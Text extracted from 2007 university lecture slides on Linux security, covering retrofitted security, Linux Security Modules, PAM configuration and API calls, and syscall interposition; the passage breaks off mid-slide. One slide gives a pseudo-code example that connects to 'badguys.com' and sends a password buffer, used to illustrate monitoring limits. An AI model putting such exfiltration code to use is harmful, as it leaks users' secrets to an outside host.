CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerCSE 543 - Computer SecurityLecture 15 - Linux SecurityOctober 18, 2007URL: http://www.cse.psu.edu/~tjaeger/cse543-f07/1CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerRetrofit Security in Existing Systems•Upside•Operating systems are costly to build from scratch•Hundreds of millions of dollars•Some become popular•Already lots of applications•A user community•Downside•“Design for security” •Will applications still work?•Is this better than building a new system?2CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerRetrofitted Systems•Lots of examples•Originally, tried to run commercial systems emulated on secure systems•Performance was terrible•Retrofitted•VAX/VMS•IBM VM/370 •Mach Microkernel•Other Microkernels•Various UNIX Systems•Trusted Solaris is the main success3CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerLinux Security•Build a protection system for Linux•Bottom-up from a variety of services•Reference monitor•Linux Security Modules framework•Provides interface for externally-defined reference monitors (LSMs)•Examples: AppArmor and SELinux•Protection states and administration•LSMs define mandatory protection state•Services to build, modify, and install•Pluggable Authentication Modules (PAM) authenticate clients4CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPluggable Authentication Modules• Centralized authentication service for Linux/Solaris• Advantages• Provides a common authentication scheme that can be used with a wide variety of applications.• Allows a large amount of flexibility and control over authentication for both the system administrator and application developer.• Allows application developers to develop programs without creating their own authentication scheme.• PAM-ified application• Uses PAM authentication technique and configuration• Receives identity• May be entrusted to forward identity to reference monitor5CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPAM Authentication•Authentication Architecture6RemoteOperating SystemLocal ApplicationPAMPAM PAMCSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPluggable Authentication Modules• Config files: /etc/pam.d/• For each PAMified application• su -- /etc/pam.d/su or /etc/pam.conf<module interface> <control flag> <module path> <module arguments>#%PAM-1.0auth required /lib/security/$ISA/pam_stack.so service=system-authaccount required /lib/security/$ISA/pam_stack.so service=system-authpassword required /lib/security/$ISA/pam_stack.so service=system-authsession required /lib/security/$ISA/pam_stack.so service=system-authsession optional /lib/security/$ISA/pam_xauth.so7CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPAM Concepts• Module Interface• Auth: authentication • Account: management + authorization• Use service; password expire• Password: set and verify passwords• Session: configure session• E.g., mount home directory• One module may provide all• pam_stack.so for each newrole interface• Modules may be ‘stacked’• Multiple support same interface• Required and optional session interfaces modules8CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaegerpam_unix.so• Auth• Authentication• pam_authenticate() and pam_setcred() (RPC credentials)• Session• Session logging• Account• Check that password has not expired• Password• Password update, includes cracklib to check strength9CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerControl Flags• Required• Must be successful• Notify after all modules on interface run• Requisite• Must be successful• Notify immediately• Sufficient• Result is ignored if failed• Pass if succeeds and no previous modules failed• Optional• Result is ignored• Must pass if no other modules10CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPAM Usage•PAMify an application•Must be able to modify the application code•Build with PAM libraries (libpam, libpam-misc, ...)•Authenticate first•Build pam_handle_t data structure•Call pam_authenticate (calls PAM module for authenticate)•Use pam_get_item to get authenticated identity•Example•Call pam_authenicate (uses module specified in config)•PAM gets username, password (or whatever)•Returns PAM_SUCCESS•Use pam_get_item to get the actual identity11CSE543 Computer (and Network) Security - Fall 2007 - Professor JaegerPAM Usage (con’t)•Session management•pam_setcred() before open session •application-specific credentials to PAM•pam_open_session()•pam_close_session()•based on module specified in config•Account management•pam_acct_mgmt()•based on module specified in config•Password •pam_chauthtok()•based on module specified in config•Q: Where is responsibility for correct authentication?12CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaeger•Syscall interposition•Argument: all harm comes to system through system calls. Hence, if you regulate their use, you can implement policy.•Systrace: system for obtaining traces of system calls and ultimately defining a policy (ACLs, more or less).•Bluebox: does largely the same thing, but allows you to define more abstract policy.kernel spaceuser spaceFor int = 0; i< 10; i++; {! z += i; ! y = y/k;! print “z y\n”;! z = 0;}SyscallinterfaceSyscall interpositionRetrofitting Reference Monitors …13CSE543 Computer (and Network) Security - Fall 2007 - Professor Jaeger•You have to expose all the semantics in the single enforcement layer•For example, think about the execve() system call•“/bin/echo” parameter leads to very different behavior than “/bin/sh” this is what buffer-overflow attacks exploit•You often need to duplicate a lot of state in enforcing some reasonable policies. Consider! !!int sock = connect( “badguys.com” );! !!…! !!send( sock, &yourpasswordbuffer );•Little you can do to unless you keep track of relationship between sock and “badguys.com”•Problems with syscall interposition …14Page CSE543 Computer and Network Security - Fall 2007 - Professor JaegerLinus’ Directive•Following a presentation of SELinux to the
View Full Document